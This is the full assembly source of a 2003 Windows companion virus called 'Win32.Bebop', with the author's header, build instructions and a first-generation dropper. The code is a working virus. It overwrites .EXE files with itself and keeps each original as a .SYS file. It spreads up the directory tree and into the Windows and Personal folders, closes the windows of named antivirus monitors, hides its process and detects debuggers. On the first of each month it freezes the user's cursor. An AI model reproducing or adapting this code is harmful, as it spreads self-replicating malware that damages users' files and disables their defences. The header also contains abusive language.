COMMENT#
____________________________________________________________________________________________
                             Win32.Bebop - Virus [Companion]
                                  coded by -DiA- (c)03
				         GermanY
____________________________________________________________________________________________


Intro: 
   Yeah! My new creature. This is a Companion Virus (what else?). Ok, I hope you enjoy
   this, and let the CODE speak...


Disclaimer:
   I am NOT responsible for any damage that you do! You can need the code however you want..
   My motherlanguage is not English, I hope you understand what I mean.                      
   Feel FREE to write any Comments to                                                        
                                       DiA_hates_machine@gmx.de


Infection:
   -infect current directory
   -travel directory's downwards and infect them all
   -go to the Windows folder and infect them
   -go to the Personal folder and infect them
   -infect twenty files per run
   -don't infect again


Features:
   -Anti-Debug
   -Anti-AV-Monitors
   -Anti-Bait


Payload:
   -on the first day every month
   -first show a little message
   -after that the cursor is very slow
   -workz with a thread


Greetz:
   Industry    - m8! See on rRLF 3
   Monochrom   - thanx for TASM32, you see... ;)
   Weed	       - thanx for all, my little ganja
   MyCrew      - Next month, HARDCORE at Skatehall! Rock on.
   ??????      - and to the fucker that send me two or three mails: "Be a Internet Million..
                 "  FUCK YOU, YOU STUPID MOTHERFUCKER! Don't send me mail's, Son of a Bitch!


First Generation:
   ;-----cut-----Bebop666.asm---------------------------------------------------------------
   .386
   .model flat
   jumps

   extrn MessageBoxA	:PROC
   extrn ExitProcess	:PROC

   .data
   oTitle	db 'Win32.Bebop - Virus - First Generation',0
   oMsg	        db 'Yo dood, this is only the first generation',10,13
	        db 'from the Bebop - Virus. Have fun, now you',10,13
	        db 'are infected...',10,13,10,13
	        db '     coded by DiA 03 GermanY',0

   .code
   FirstGen:
   push 16
   push offset oTitle
   push offset oMsg
   push 0
   call MessageBoxA

   push 0
   call ExitProcess

   end FirstGen
   ;-----cut--------------------------------------------------------------------------------


Compile:
   First Gen->
      TASM32 /z /ml /m3 Bebop666,,;
      TLINK32 -Tpe -c -aa Bebop666,Bebop666,, import32.lib
      rename Bebop666.EXE Bebop.SYS

   Virus    ->
      TASM32 /z /ml /m3 Bebop,,;
      TLINK32 -Tpe -c -aa Bebop,Bebop,, import32.lib

   [Bebop.EXE and Bebop.SYS must be in one directory]


Ok, that's it! I write many comment's in the code...
    ...HAVE FUN and read my tut's! :)

____________________________________________________________________________________________
____________________________________________________________________________________________
#


;-------------------------------------------------------------------------------------------
;-----HEAD----------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.386
.model flat
jumps
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Needed API's--------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
extrn IsDebuggerPresent		:PROC
extrn GetCurrentProcessId	:PROC
extrn RegisterServiceProcess	:PROC
extrn GetCommandLineA		:PROC
extrn lstrcpyA			:PROC
extrn CreateProcessA		:PROC
extrn CopyFileA			:PROC
extrn FindFirstFileA		:PROC
extrn FindNextFileA		:PROC
extrn SetCurrentDirectoryA	:PROC
extrn RegOpenKeyExA		:PROC
extrn RegQueryValueExA		:PROC
extrn RegCloseKey		:PROC
extrn FindWindowA		:PROC
extrn PostMessageA		:PROC
extrn GetWindowsDirectoryA	:PROC
extrn GetSystemTime		:PROC
extrn CreateThread		:PROC
extrn CloseHandle		:PROC
extrn GetCursorPos		:PROC
extrn SetCursorPos		:PROC
extrn Sleep			:PROC
extrn MessageBoxA		:PROC
extrn ExitProcess		:PROC
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Nedded DATA's-------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.data?
FILETIME		STRUC
FT_dwLowDateTime	dd ?
FT_dwHighDateTime	dd ?
FILETIME		ENDS

WIN32_FIND_DATA          label    byte
 WFD_dwFileAttributes    dd       ?
 WFD_ftCreationTime      FILETIME ?
 WFD_ftLastAccessTime    FILETIME ?
 WFD_ftLastWriteTime     FILETIME ?
 WFD_nFileSizeHigh       dd       ?
 WFD_nFileSizeLow        dd       ?
 WFD_dwReserved0         dd       ?
 WFD_dwReserved1         dd       ?
 WFD_szFileName          db       260d dup (?)
 WFD_szAlternateFileName db       13   dup (?)
 WFD_szAlternateEnding   db       03   dup (?)

SYSTEMTIME:
 wYear			WORD ?
 wMonth            	WORD ?
 wDayOfWeek        	WORD ?
 wDay              	WORD ?
 wHour             	WORD ?
 wMinute           	WORD ?
 wSecond           	WORD ?
 wMilliseconds     	WORD ?

POINT:
 x  			DWORD ?
 y  			DWORD ?


VirusFile	db 260d dup (?)
HostFile	db 260d dup (?)
TargetFile	db 260d dup (?)

ProcessInfo	dd 4 dup (?)
StartupInfo	dd 4 dup (?)

PersonalFolder	db 260d dup (?)
WindowsFolder	db 260d dup (?)

.data
AVP		db 'AVP Monitor',0
McAfee		db 'McAfee VShield',0
Solomon		db 'SCAN32',0
FProt		db 'FP-WIN',0
Norton		db 'NAVAPW32',0

FindHandle	dd 0
RegHandle	dd 0
lpType		dd 0
ThreadID	dd 0

FileMask	db '*.EXE',0
FileCounter	db 20

Size		dd 260d

ShellFolders	db '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
Personal	db 'Personal',0

oTitle		db 'Win32.Bebop - Virus',0
oMsg		db 'Yeah! Bebop get''s you. Don''t be angry, this nice',10,13
		db 'Virus don''t have any DESTRUCTIVE CODE!',10,13
		db 'Or for stupid people: Wait a while, next day the',10,13
		db 'Bebop-Virus go away...',10,13,10,13
		db '   Win32.Bebop coded by DiA (c)2003 [GermanY]',0
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Win32.Bebop starts--------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.code
Bebop:
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Fuck some AV-Monitors-----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
call AntiDebugger			;check for debugger

mov esi,offset AVP
call KillMonitor			;kill the window

mov esi,offset McAfee
call KillMonitor			;kill the window

mov esi,offset Solomon
call KillMonitor			;kill the window

mov esi,offset FProt
call KillMonitor			;kill the window

mov esi,offset Norton
call KillMonitor			;kill the window
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Hide the Bebop Process----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
call GetCurrentProcessId		;get id to hide the Bebop

push 1					;register as "SystemService"
push eax				;ProcessID
call RegisterServiceProcess
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Restore Hostname & Run Host-----------------------------------------------------------
;-------------------------------------------------------------------------------------------
call GetCommandLineA			;looks like "C:\MyC00lPr0gZ\veryCool\Fucking.EXE"

inc eax					;fuck the "
push eax
push offset VirusFile			;copy it to VirusFile to work with it
call lstrcpyA				;copy the string

mov esi,offset VirusFile
call GetPoint				;get the point (...ddd.EXE") to clear "
mov dword ptr [esi+4],00000000h		;fuck it, now we have the path of the VirusFile

push offset VirusFile			;copy path of VirusFile to
push offset HostFile			;HostFile, to work with it
call lstrcpyA

mov esi,offset HostFile
call GetPoint				;get point to rename it
mov dword ptr [esi],5359532Eh		; SYS. ,now we have the path of the HostFile

call AntiDebugger			;check for debugger

xor eax,eax				;null
push offset ProcessInfo
push offset StartupInfo
push eax
push eax
push 10h				;create a new process
push eax
push eax
push eax
push offset HostFile			;path for HostFile
push offset HostFile			;run this file
call CreateProcessA
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Travel Directorys & Infect them-------------------------------------------------------
;-------------------------------------------------------------------------------------------
mov esi,offset HostFile			;don't need anymore, use it to get the directory
call GetPoint				;first get the point
mov ebx,esi				;first get the path of current dir
call CDdotdot				;-"-
call InfectFiles			;and infect files in this directory

InfectCDdotdot:
call CDdotdot				;cd..
test ebx,ebx				;error code?
jz InfectNext				;if yes search other dir's

call InfectFiles			;infect it!
jmp InfectCDdotdot			;cd.. , infect, cd.. , ...

InfectNext:				;other directorys
call AntiDebugger			;often!

push 260d
push offset WindowsFolder		;save there
call GetWindowsDirectoryA		;easyer to get it with api, not registry

mov esi,offset WindowsFolder		;set directory
call SetDirectory
call InfectFiles			;and infect them

call GetPersonalDir			;infect them too
mov esi,offset PersonalFolder		;to set the directory
call SetDirectory			;set it
call InfectFiles			;infect them
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Payload, if Day 1. of Month-----------------------------------------------------------
;-------------------------------------------------------------------------------------------
push offset SYSTEMTIME			;structure
call GetSystemTime			;get time

cmp word ptr [wDay],1			;first day of mounth?
jne FuckingDebugger			;if not exit

push offset ThreadID			;the ID
push 0
push 0
push offset StopCursor			;the pklace where are the thread
push 0
push 0
call CreateThread

push eax				;close da handle
call CloseHandle			;close it

GetCurrentPos:				;get current cursor pos
push offset POINT			;structure
call GetCursorPos
jmp GetCurrentPos			;again and again
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Exit & stay (sic)---------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
FuckingDebugger:
push 0
call ExitProcess
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Infect Files Procedure----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
InfectFiles:				;procedure
call AntiDebugger			;fuck you!

push offset WIN32_FIND_DATA		;Win32 find data is kewl
push offset FileMask			;'*.EXE',0
call FindFirstFileA			;find first
mov dword ptr [FindHandle],eax		;save da handle

FindNext:
test eax,eax				;error?
jz FindMore				;check other directory's

push offset WFD_szFileName		;copy filename of founded file
push offset TargetFile			;to rename and copy it
call lstrcpyA

xor eax,eax				;null
mov esi,offset TargetFile		;is it bait?
mov edi,esi
mov ecx,48d				;0

CheckBait:				;check for bait
lodsb					;load one byte

CheckNum:				;check for a digit
cmp eax,46d				; point?
je Bait					;don't infect, it's a fucking bait

cmp eax,ecx				;a number?
je ScanNext				;scan next digit

cmp eax,57d				;over 9
ja NoBait				;it's no bait, ...infect them

inc ecx					;check next number (0,1,2,3,4,...)
jmp CheckNum				;again

ScanNext:				;scan next place
stosb					;save the byte (edi,esi +1)
mov ecx,48d				;restore ecx
jmp CheckBait				;check ma

NoBait:					;go on with infection

mov esi,offset TargetFile		;find point to rename
call GetPoint
mov dword ptr [esi],5359532Eh		;rename to .SYS

push 1					;don't copy if file allready exist
push offset TargetFile			;copy to this path and filename (TargetFile.SYS)
push offset WFD_szFileName		;the real name to the fake name
call CopyFileA

test eax,eax				;error -> file already exist
jz FindNextPhile			;jmp

push 0					;copy always
push offset WFD_szFileName		;copy the VirusFile over the real File
push offset VirusFile			;now HostName: xxx.SYS VirusName: xxx.EXE
call CopyFileA

dec byte ptr [FileCounter]		;counter -1
cmp byte ptr [FileCounter],0		;zero?
jz FuckingDebugger			;if yes exist

FindNextPhile:
call AntiDebugger			;antiman

Bait:					;search next file, last was a bait
push offset WIN32_FIND_DATA		;get info from Win32FindData
push dword ptr [FindHandle]		;handle of file we search...
call FindNextFileA
jmp FindNext				;go up!

FindMore:
ret					;return and search in other directory's
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Anti Debug Procedure------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
AntiDebugger:
call IsDebuggerPresent			;check for Debugger
test eax,eax				;if yes jmp to...
jnz FuckingDebugger			;FuckingDebugger:
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Get Point Procedure-------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
GetPoint:				;procedure
cmp byte ptr [esi],'.'			;check for point
jz FoundPoint				;if point, return
inc esi					;if not check next place
jmp GetPoint
FoundPoint:
call AntiDebugger
ret					;return
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----CD.. Procedure------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
CDdotdot:				;procedure
GetSlash:				;'\'
cmp byte ptr [ebx],'\'
jz ClearAfter				;if yes, clear al after the \

cmp byte ptr [ebx],':'			; are we at C:\
jz SetError				;set a error code and exit procedure

dec ebx					;esi -1
jmp GetSlash				;search again

ClearAfter:				;clear all after the slash
inc ebx					;but don't clear \ (needed to travel!)
mov dword ptr [ebx],00000000h		;fuck it all, fuck this world, fuck everything th...
sub ebx,2				;go in front of \

mov esi,offset HostFile			;now a path for the directory cd..

SetDirectory:				;procedure
push esi
call SetCurrentDirectoryA		;set the dir
ret					;return

SetError:				;we are at C:, can't cd.. anymore
xor ebx,ebx				;zero
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Read Personal Directory from Registry Procedure---------------------------------------
;-------------------------------------------------------------------------------------------
GetPersonalDir:				;procedure
push offset RegHandle			;save there the handle
push 001F0000h				;read and write
push 0
push offset ShellFolders		;subkey
push 80000003h				;HKEY_...
call RegOpenKeyExA			;open the subkey

test eax,eax				;error?
jnz RegError				;set error code and return

push offset Size				;260d
push offset PersonalFolder		;save the value there
push offset lpType			;fuck off
push 0
push offset Personal			;value name
push dword ptr [RegHandle]		;handle from subkey
call RegQueryValueExA			;read!

RegError:				;error!
call AntiDebugger

push dword ptr [RegHandle]		;close reg
call RegCloseKey
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Anti AV-Monitor Procedure-------------------------------------------------------------
;-------------------------------------------------------------------------------------------
KillMonitor:
call AntiDebugger

push esi				;offset to monitor name
push 0
call FindWindowA			;find it

test eax,eax				;error?
jz FuckNextMonitor			;return

push 0
push 0
push 12h				;WM_QUIT = kill
push eax				;handle of window
call PostMessageA			;shot 'em up

FuckNextMonitor:
ret					;return
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Stop the Cursor Procedure-------------------------------------------------------------
;-------------------------------------------------------------------------------------------
StopCursor:
push 16
push offset oTitle
push offset oMsg
push 0
call MessageBoxA

call AntiDebugger

SleepStop:
push 2000d				;sleep 2sek
call Sleep

xor edx,edx
StopIt:
cmp edx,4000d
je SleepStop

push dword ptr [y]			;y coor
push dword ptr [x]			;x coor
call SetCursorPos			;stop it

inc edx
jmp StopIt				;stop again
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------


;-------------------------------------------------------------------------------------------
;-----Win32.Bebop ends----------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
end Bebop
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;------------------------------------------------------------------------Germany2003--------